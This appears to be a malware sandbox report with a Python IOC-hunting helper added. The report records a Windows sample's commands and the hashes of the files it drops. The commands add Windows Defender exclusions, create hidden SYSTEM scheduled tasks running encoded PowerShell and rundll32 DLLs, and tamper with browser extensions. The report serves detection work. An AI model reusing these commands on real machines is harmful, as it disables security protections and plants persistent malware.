"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gMcnYgWbv" /SC once /ST 04:16:05 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gMcnYgWbv"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gMcnYgWbv"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "BAnwxolbGpCzXNxkj" /SC once /ST 13:59:21 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe\" XT /rBsite_idGuS 385118 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "BAnwxolbGpCzXNxkj"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe

C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe XT /rBsite_idGuS 385118 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bWycNackLSywaqkmgR"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ByWuwrOBU\ojTVpK.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qbSDwEgyNYPZlGA" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "qbSDwEgyNYPZlGA2" /F /xml "C:\Program Files (x86)\ByWuwrOBU\WnleIRa.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "qbSDwEgyNYPZlGA"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "qbSDwEgyNYPZlGA"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "yJQYurcljWrTFb" /F /xml "C:\Program Files (x86)\RVqmAwyyxwiU2\LHvjJyj.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "MrNSpwukvDtlP2" /F /xml "C:\ProgramData\wGkeBUkfAIhWvVVB\DnXqKSf.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "qnWLzqfHNJaEQUiUn2" /F /xml "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\FaYwZcq.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "FBXQMyjqJGqSqkHthaW2" /F /xml "C:\Program Files (x86)\DUGaRsFaSnqjC\OTNmBJT.xml" /RU "SYSTEM"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "QhciBzJOokLnyYZub" /SC once /ST 04:13:59 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ofqvFcNvzeRditbz\vnZdJwDB\qxswCCh.dll\",#1 /Fosite_idXfG 385118" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "QhciBzJOokLnyYZub"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ofqvFcNvzeRditbz\vnZdJwDB\qxswCCh.dll",#1 /Fosite_idXfG 385118

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ofqvFcNvzeRditbz\vnZdJwDB\qxswCCh.dll",#1 /Fosite_idXfG 385118

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "BAnwxolbGpCzXNxkj"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "QhciBzJOokLnyYZub"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\Pictures\m2oZU2kuNyXNzQIRlFQBnoBQ.exe

"C:\Users\Admin\Pictures\m2oZU2kuNyXNzQIRlFQBnoBQ.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce-installer_7.14.2_vbox-6.1.20.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce-installer_7.14.2_vbox-6.1.20.exe

C:\Windows\SYSTEM32\msiexec.exe

"msiexec.exe" /qn /i VirtualBox-6.1.20-r143896.msi ADDLOCAL=VBoxApplication,VBoxPython VBOX_INSTALLDESKTOPSHORTCUT=0 VBOX_INSTALLQUICKLAUNCHSHORTCUT=0 /log "C:\Users\Admin\AppData\Local\Temp\charityengine-install-vbox-log.txt"

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

Network


Files


C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404521\assistant\assistant_installer.exe

MD5 976bc8e5fe65f9bb56831e20f1747150
SHA1 f9e7f5628aaaabed9939ef055540e24590a9ccfb
SHA256 f53c916ccf3d24d6793227283de2db0f6cc98a2275413851807cc080643d21a0
SHA512 2858e7e08418b170b21b599afb02236d0480d35a5605de142f10976489e01daf2ad80df0f09c2eb38bc5a971336d1f6aa9909c520bcdb18e9c9a8e903379dcd9

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404521\assistant\dbghelp.dll

MD5 544255258f9d45b4608ccfd27a4ed1dd
SHA1 571e30ceb9c977817b5bbac306366ae59f773497
SHA256 3b02fc85602e83059f611c658e3cad6bc59c3c51214d4fe7e31f3ac31388dd68
SHA512 2093da881fa90eec2b90d1ca6eaaff608fe16ac612571a7fd5ed94dd5f7ff7e5c1e8c862bab0a228850829527886473e3942abd23a81d10cab8f9baad2cc7664

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404521\assistant\dbgcore.dll

MD5 9ebb919b96f6f94e1be4cdc6913ef629
SHA1 31e99ac4fba516f82b36bd81784e8d518b32f9df
SHA256 fdae21127deb16eb8ba36f2493d2255f4cb8ab4c18e8bd8ba5e587f5a7ecd119
SHA512 a1b42f7d2896da270bb3c80cf9b88c4b4f1491084e7aa7760eeea5533b26f041dc79b21d5ffd2bba2221fe118e0a8d912e170f24fd895c9315b1ee9c7adfe700

C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe

MD5 397926927bca55be4a77839b1c44de6e
SHA1 e10f3434ef3021c399dbba047832f02b3c898dbd
SHA256 4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7
SHA512 cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

memory/3076-649-0x0000000000400000-0x0000000001A40000-memory.dmp

memory/2172-674-0x0000000000400000-0x0000000001DFD000-memory.dmp

memory/1424-676-0x0000000000400000-0x00000000008AD000-memory.dmp

C:\Windows\windefender.exe

MD5 8e67f58837092385dcf01e8a2b4f5783
SHA1 012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
SHA512 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

memory/1072-686-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/2172-698-0x0000000000400000-0x0000000001DFD000-memory.dmp

memory/1424-701-0x0000000000400000-0x00000000008AD000-memory.dmp

memory/2172-742-0x0000000000400000-0x0000000001DFD000-memory.dmp

memory/1460-743-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/2172-750-0x0000000000400000-0x0000000001DFD000-memory.dmp

memory/244-758-0x0000000010000000-0x0000000013BC3000-memory.dmp

C:\Windows\system32\GroupPolicy\Machine\Registry.pol

MD5 cdfd60e717a44c2349b553e011958b85
SHA1 431136102a6fb52a00e416964d4c27089155f73b
SHA256 0ee08da4da3e4133e1809099fc646468e7156644c9a772f704b80e338015211f
SHA512 dfea0d0b3779059e64088ea9a13cd6b076d76c64db99fa82e6612386cae5cda94a790318207470045ef51f0a410b400726ba28cb6ecb6972f081c532e558d6a8

memory/1460-784-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/2172-783-0x0000000000400000-0x0000000001DFD000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c9e74ed00e926c59becad69a5caa346a
SHA1 de60ae4e1749a56690f1d774ccb4ab725005a3c4
SHA256 7dbdeb170717f76e81ab1142469c05994e25c9a17bc21b503e9d6484a70210e2
SHA512 5c74c472f5d356a6c83f4656362034a11f02f57dc27ac14aab914e0567495ffb0d45b5f348734e9ab9c1f5c9374a39f99111312bb29b4a55394e8aaf13f32b80

C:\Windows\system32\GroupPolicy\gpt.ini

MD5 a62ce44a33f1c05fc2d340ea0ca118a4
SHA1 1f03eb4716015528f3de7f7674532c1345b2717d
SHA256 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA512 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

MD5 8679b2ab6610d033f5c98beb5063989a
SHA1 44dbd2010f4821d0134fbafb57ee9465d12150f3
SHA256 b56bf1ef6e30f1f0e7109627e8859a8270e7c2d290b0d5183d083c7ed0c083a8
SHA512 f3c4200896b69c1dc9c4db2e5bab7a4bddc9c253eee7aa4e63b8f6b337a6a5e9feaf03cb86455230e91509ddb29a6b78d1f7139111690e9b1b3ef0a3c246bea6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

MD5 bd6b60b18aee6aaeb83b35c68fb48d88
SHA1 9b977a5fbf606d1104894e025e51ac28b56137c3
SHA256 b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA512 3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 ef6984033cbe2419e353faffb46dc4cc
SHA1 0e938ec38d1780bb65af4fb846af4c5246ec656b
SHA256 8ce3d7b37e0253f2299825378a133f8c5c98d41e34523eae48fb84aaf2d2c134
SHA512 c80c500d4c49b5cc34510843f9b709c6eced8f5a9cc98d95c7be0146889c0d2fe6231302a72b0f3445f512973aa30c11d61477ae1303cc2cd5f3f4f629dc7f90

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ta9v328x.default-release\prefs.js

MD5 21d1dbcbff005cc27d3ee4c8b5d40e15
SHA1 4ba78901a2cc94f8e41e3f4ed908eff46751baf6
SHA256 65f3e18ba77d36a9dc6a26a7085fa68d2a5afeafe6a400dee5f6aecb06f5fcf5
SHA512 14dbaeb2bc4a14751c79203988f7897fccfb9a8261bb5908ec7a231a9b49a5a5612a2e3b6e52d4755299941018466c8f3020c6b7669d3aa362f177c87a0270e5

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 db3aec3ef659a65b6676644336d0f8c4
SHA1 83c05ee25a84c6ff136694f19b4bbd0ee34bd997
SHA256 4231e2fd0fcad36fda58f669884b508bdb308a45becc9821c181f3a18aed48de
SHA512 73802b69af66d2c4ebd2cf401e7ff17f2d632307ea7253bf5b8a673c8e90c254abb01ad739a14b2a5cc8e9358e6beae59abc92c127bd2447a24eed43a6ba19af

C:\Users\Admin\Pictures\m2oZU2kuNyXNzQIRlFQBnoBQ.exe

MD5 31fdaf5dfa78088a896093d9ff996ee0
SHA1 ae94f8a18af6de6be9ef3cba0e77d541b6455a00
SHA256 657aaac97ab7af616faa4836e62b708448e44f157ff5fa221d8ef6d889930789
SHA512 5afc90626d59d1639fe9b014cccaf8d88fbdbdb4be64add8c35fd14f993b8571cae343c7fda4d535c0968ab790530db9df18a1b229fb17b7d793531a3c42d006
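The listing above is flat text, one path followed by its MD5/SHA1/SHA256/SHA512 lines, interleaved with memory-dump entries of the form memory/PID-SEQ-START-END-memory.dmp. The following Python is an added example, not part of the sandbox report or its tooling: it parses that layout into records, validates the digest lengths, builds a SHA256 lookup index, and offers a hash-and-compare helper for hunting the dropped files on another host. The sample text is constructed from a handful of the entries shown above; the function and class names are the example's own.

```python
"""Parse a sandbox 'Files' listing into IOC records and hunt for them by SHA256.

Added example; the report format it parses is the plain-text layout shown above.
"""
import hashlib
import re
from dataclasses import dataclass, field
from pathlib import Path
from typing import Dict, List, Tuple

HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-f]+)$")
MEMDUMP_RE = re.compile(
    r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$"
)
HASH_LENGTHS = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}


@dataclass
class DroppedFile:
    path: str
    hashes: Dict[str, str] = field(default_factory=dict)


@dataclass
class MemoryDump:
    pid: int
    seq: int
    start: int
    end: int

    @property
    def size(self) -> int:
        return self.end - self.start


def parse_listing(text: str) -> Tuple[List[DroppedFile], List[MemoryDump]]:
    """Walk the listing line by line; a non-hash, non-dump line starts a new file."""
    files: List[DroppedFile] = []
    dumps: List[MemoryDump] = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = MEMDUMP_RE.match(line)
        if m:
            pid, seq, start, end = m.groups()
            dumps.append(MemoryDump(int(pid), int(seq), int(start, 16), int(end, 16)))
            current = None  # a dump entry carries no hash lines
            continue
        m = HASH_RE.match(line)
        if m:
            algo, digest = m.groups()
            if current is None:
                raise ValueError(f"hash line without a preceding path: {line}")
            if len(digest) != HASH_LENGTHS[algo]:
                raise ValueError(f"{algo} digest has wrong length on {current.path}")
            current.hashes[algo] = digest
            continue
        current = DroppedFile(path=line)
        files.append(current)
    return files, dumps


def sha256_index(files: List[DroppedFile]) -> Dict[str, List[str]]:
    """Map SHA256 -> every report path it was seen under (paths repeat in the listing)."""
    index: Dict[str, List[str]] = {}
    for f in files:
        digest = f.hashes.get("SHA256")
        if digest:
            index.setdefault(digest, []).append(f.path)
    return index


def sha256_bytes(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def scan_directory(root: Path, index: Dict[str, List[str]]) -> List[Tuple[Path, List[str]]]:
    """Hash every regular file under root and return those matching an IOC SHA256."""
    hits = []
    for p in root.rglob("*"):
        if p.is_file():
            digest = sha256_bytes(p.read_bytes())
            if digest in index:
                hits.append((p, index[digest]))
    return hits


# Constructed sample: a few entries copied from the listing above.
SAMPLE = """
memory/244-758-0x0000000010000000-0x0000000013BC3000-memory.dmp

C:\\Windows\\windefender.exe

MD5 8e67f58837092385dcf01e8a2b4f5783
SHA1 012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
SHA512 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

C:\\Users\\Admin\\AppData\\Local\\Temp\\csrss\\injector\\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5
"""

if __name__ == "__main__":
    files, dumps = parse_listing(SAMPLE)
    for f in files:
        print(f"{f.hashes['SHA256']}  {f.path}")
    for d in dumps:
        print(f"pid {d.pid} region 0x{d.start:x}-0x{d.end:x} ({d.size} bytes)")
```

Feed the whole Files section to parse_listing to get the complete IOC set; sha256_index keeps every path a digest was reported under, which matters here because the same profile and preference files appear repeatedly with different hashes as the sample rewrites them.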